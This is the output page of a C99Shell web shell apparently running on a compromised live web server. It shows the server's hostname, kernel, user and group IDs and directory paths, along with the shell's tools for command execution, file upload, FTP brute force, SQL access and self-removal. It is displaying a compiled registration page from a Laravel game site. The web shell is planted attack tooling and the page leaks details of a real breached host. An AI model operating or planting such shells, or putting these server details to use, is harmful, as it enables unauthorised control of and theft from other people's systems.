!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/game.picotech.app/public_html/core/storage/framework/views/   drwxr-xr-x
Free 29.26 GB of 117.98 GB (24.8%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     880f7555ef1d392cd9d2d203a433be69.php (3.91 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Register</title>

  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/OwlCarousel2/2.3.4/assets/owl.carousel.min.css">
  <link rel="stylesheet"
    href="https://cdnjs.cloudflare.com/ajax/libs/OwlCarousel2/2.3.4/assets/owl.theme.default.min.css">
  <link rel="stylesheet"
    href="https://cdnjs.cloudflare.com/ajax/libs/OwlCarousel2/2.3.4/assets/owl.theme.default.min.css">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
  <link rel="stylesheet" href="<?php echo e(asset('core/public/front/style.css')); ?>">
  <link rel="stylesheet" href="<?php echo e(asset('core/public/front/responsive.css')); ?>">
</head>

<body class="login-bg">
  <?php
  $setting 
DB::table('settings')->first();
  
$logo $setting->logo ?? '';
  
?>

  <div class="container form-content">
    <div class="form">
      <div class="row">
        <div class="col-lg-6 col-md-6 p-0 boder-login bg-color-left">
          <div class="login-header text-center">
            <a href="#" class="login-header-link text-center">
              <img src="<?php echo e(asset('assets/images/'.$logo)); ?>" alt="">
            </a>
            <h1>Start Your Journey.</h1>
            <p>Unlock Opportunities: Register Now for Limitless Access and Exclusive Benefits!</p>
          </div>
        </div>
        <div class="col-lg-6 col-md-6 p-0 bg-color-right boder-login">
          <div class="form-content">
            <form action="<?php echo e(route('user.register.submit')); ?>">
              <div class="form-group input-underline">
                <input class="form-control" type="text" name="first_name">
                <label>First Name</label>
              </div>
              <div class="form-group input-underline">
                <input class="form-control" type="text" name="last_name">
                <label>Last Name</label>
              </div>
              <div class="form-group input-underline">
                <div class="input-group">
                  <input class="form-control email" type="email" name="email">
                  <div class="input-group-append">
                    <button type="button" class="btn btn-sm get-ccode-btn">Get Code</button>
                  </div>
                </div>
                <label>Email</label>
              </div>
              <div class="form-group input-underline">
                <input class="form-control" type="password" name="password">
                <label>Password</label>
              </div>
              <div class="row">
                <div class="col-12">
                  <button type="submit" class="btn mt-4 sign-in-btn-submit">Register Now</button>
                </div>
              </div>
              <div class="text-center a3 mt-3">
                Already have an account?
                <a href="<?php echo e(route('user.login')); ?>" class="a3-primary" id="sign_upnow">Sign in</a>
              </div>
            </form>
          </div>
        </div>
      </div>
    </div>
  </div>

  <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/OwlCarousel2/2.3.4/owl.carousel.min.js"></script>

</body>

</html><?php /**PATH D:\PicTech\unipin\unipin\core\resources\views/user/auth/register.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0044 ]--